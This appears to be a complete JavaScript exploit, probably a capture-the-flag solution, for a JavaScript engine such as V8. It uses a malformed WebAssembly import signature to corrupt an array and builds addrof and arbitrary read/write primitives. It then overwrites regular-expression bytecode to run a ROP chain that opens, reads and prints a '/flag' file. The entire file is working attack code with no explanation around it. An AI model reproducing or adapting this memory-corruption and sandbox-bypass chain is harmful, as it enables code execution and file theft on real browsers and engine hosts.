new ArrayBuffer(0x7fe00000); new ArrayBuffer(0x7fe00000); let arr = [ 3.6943953506820553047070760262e-311, 1.11253692992607195990269950621e-308, 3.3, 4.4, ]; let float_arr = [1.1, 2.2]; let obj_arr = [arr, arr]; new ArrayBuffer(0x7fe00000); new ArrayBuffer(0x7fe00000); let cor; function ff(a, b, c, d, e, f, g, h, i, j, k, l, m, n) { postMessage("aaaa"); cor = m; exp(); } function exp() { var buf = new ArrayBuffer(8); var dv = new DataView(buf); var u8 = new Uint8Array(buf); var u32 = new Uint32Array(buf); var u64 = new BigUint64Array(buf); var f32 = new Float32Array(buf); var f64 = new Float64Array(buf); var f64toi64 = (f) => { f64[0] = f; return u64[0]; }; var i64tof64 = (f) => { u64[0] = f; return f64[0]; }; var ftoil = (f) => { f64[0] = f; return u32[0]; }; var ftoih = (f) => { f64[0] = f; return u32[1]; }; var hex = (i) => { return i.toString(16).padStart(16, "0"); }; var pair_i32_to_f64 = (p1, p2) => { u32[0] = p1; u32[1] = p2; return f64[0]; }; console.error("Length:", cor.length); function addrof(o) { obj_arr[0] = o; return ftoil(cor[0x1a7a]); } function aar(addr) { u32[0] = addr - 8; u32[1] = 0x4; cor[0x1a78] = f64[0]; return float_arr[0]; } function aaw(addr, value) { u32[0] = addr - 8; u32[1] = 0x4; cor[0x1a78] = f64[0]; float_arr[0] = value; } /////////////////// // sandbox bypass now var s = "aaaaa"; var regex = /[a-zA-Z0-9]*[a-zA-Z0-9]*[a-zA-Z0-9]*[a-zA-Z0-9]*[a-zA-Z0-9]*[a-zA-Z0-9]*[a-zA-Z0-9]*[a-zA-Z0-9]*/g; var res1 = regex.exec(s); var addr_regex = addrof(regex); console.error("regex addr", hex(addr_regex)); var data_addr = ftoil(aar(addr_regex + 0xc)); console.error("data addr", hex(data_addr)); var bytecode = ftoil(aar(data_addr + 0x1c)); console.error("bytecode addr", hex(bytecode)); aaw(data_addr + 0x30, pair_i32_to_f64(2, ftoih(aar(data_addr + 0x30)))); var arr = []; function push_reg(idx) { arr.push(((idx << 8) & 0xffffff00) | 0x03); } function pop_reg(idx) { arr.push(((idx << 8) & 0xffffff00) | 0x0c); } function mov_reg1_to_reg2(idx1, idx2) { push_reg(idx1); pop_reg(idx2); } function advance_reg(idx, value) { arr.push(((idx << 8) & 0xffffff00) | 0x09); arr.push(value); } function set_reg(idx, value) { arr.push(((idx << 8) & 0xffffff00) | 0x08); arr.push(value); } function success() { arr.push(0x0000000e); } function add_gadget(addr) { mov_reg1_to_reg2(3, 5); advance_reg(5, addr); mov_reg1_to_reg2(5, idx++); mov_reg1_to_reg2(4, idx++); } var idx = 0x52; mov_reg1_to_reg2(0x53, 4); mov_reg1_to_reg2(0x52, 3); advance_reg(3, 0xfbe66f05); add_gadget(0x0d9c9ec1); // pop r14; ret; set_reg(idx++, 0x616c662f); set_reg(idx++, 0x6c662f67); add_gadget(0x0d9bfe5a); // pop rax; ret; add_gadget(0x0e30b000); add_gadget(0x0d95ecab); // mov qword ptr [rax+0x38], r14; pop rbx; pop r14; pop rbp; ret; set_reg(idx++, 0xdeadbeef); set_reg(idx++, 0xdeadbeef); set_reg(idx++, 0xdeadbeef); set_reg(idx++, 0xdeadbeef); set_reg(idx++, 0xdeadbeef); set_reg(idx++, 0xdeadbeef); add_gadget(0x0d9c9ec1); // pop r14; ret; set_reg(idx++, 0x6761); set_reg(idx++, 0); add_gadget(0x0d9bfe5a); // pop rax; ret; add_gadget(0x0e30b008); add_gadget(0x0d95ecab); // mov qword ptr [rax+0x38], r14; pop rbx; pop r14; pop rbp; ret; set_reg(idx++, 0xdeadbeef); set_reg(idx++, 0xdeadbeef); set_reg(idx++, 0xdeadbeef); set_reg(idx++, 0xdeadbeef); set_reg(idx++, 0xdeadbeef); set_reg(idx++, 0xdeadbeef); add_gadget(0x0d9cab47); // pop rdi; ret; add_gadget(0x0e30b000 + 0x38); add_gadget(0x0d9c9ec2); // pop rsi; ret; set_reg(idx++, 0); set_reg(idx++, 0); add_gadget(0x0d9bfe5a); // pop rax; ret; set_reg(idx++, 0x00000002); set_reg(idx++, 0); add_gadget(0x091ff0a1); // syscall; ret; add_gadget(0x0d9c9ec2); // pop rsi; ret; add_gadget(0x0e30b010 + 0x38); add_gadget(0x0a217c93); // mov rdi, rax; mov [rsi+8], rdi; pop rbp; ret; set_reg(idx++, 0xdeadbeef); set_reg(idx++, 0xdeadbeef); add_gadget(0x0d9cf582); // pop rdx; ret; set_reg(idx++, 0x80); set_reg(idx++, 0); add_gadget(0x0d9bfe5a); // pop rax; ret; set_reg(idx++, 0x00000000); set_reg(idx++, 0); add_gadget(0x091ff0a1); // syscall; ret; add_gadget(0x0d9cab47); // pop rdi; ret; set_reg(idx++, 2); set_reg(idx++, 0); add_gadget(0x0d9c9ec2); // pop rsi; ret; add_gadget(0x0e30b010 + 0x38); add_gadget(0x0d9cf582); // pop rdx; ret; set_reg(idx++, 0x80); set_reg(idx++, 0); add_gadget(0x0d9bfe5a); // pop rax; ret; set_reg(idx++, 0x00000001); set_reg(idx++, 0); add_gadget(0x091ff0a1); // syscall; ret; success(); var bbuf = new ArrayBuffer((arr.length + 1) * 4); var bview = new DataView(bbuf); for (var i = 0; i < arr.length; i++) { bview.setUint32(i * 4, arr[i], true); } if (arr.length % 2 == 1) { bview.setUint32(arr.length * 4, 0, true); } u32[0] = bytecode; u32[1] = 0x400; cor[0x1a78] = f64[0]; for (var i = 0; i < Math.floor(arr.length / 2 + 1); i++) { float_arr[i] = bview.getFloat64(i * 8, true); } console.error("exec!"); var res = regex.exec(s); } function corrupt() { let wasmCode = new Uint8Array([ 0, 97, 115, 109, 1, 0, 0, 0, 1, 21, 2, 96, 14, 123, 124, 124, 124, 124, 124, 124, 126, 126, 126, 126, 126, 108, 112, 0, 96, 0, 0, 2, 11, 1, 3, 109, 111, 100, 3, 102, 111, 111, 0, 0, 3, 2, 1, 1, 7, 8, 1, 4, 109, 97, 105, 110, 0, 1, 9, 5, 1, 3, 0, 1, 0, 10, 125, 1, 123, 1, 1, 100, 108, 253, 12, 0, 0, 224, 221, 183, 213, 235, 65, 0, 0, 224, 221, 183, 213, 235, 65, 68, 154, 153, 153, 153, 153, 153, 241, 63, 68, 154, 153, 153, 153, 153, 153, 241, 63, 68, 154, 153, 153, 153, 153, 153, 241, 63, 68, 154, 153, 153, 153, 153, 153, 241, 63, 68, 154, 153, 153, 153, 153, 153, 241, 63, 68, 209, 196, 20, 0, 0, 0, 0, 0, 66, 187, 247, 238, 221, 11, 66, 187, 247, 238, 221, 11, 66, 187, 247, 238, 221, 11, 66, 187, 247, 238, 221, 11, 66, 187, 247, 238, 221, 11, 65, 170, 213, 170, 213, 122, 251, 28, 34, 0, 210, 0, 210, 0, 20, 0, 11, 0, 14, 4, 110, 97, 109, 101, 1, 7, 1, 1, 4, 109, 97, 105, 110, ]); var wasmModule = new WebAssembly.Module(wasmCode); var instance = new WebAssembly.Instance(wasmModule, { mod: { foo: ff } }); let f = instance.exports.main; f(); } corrupt();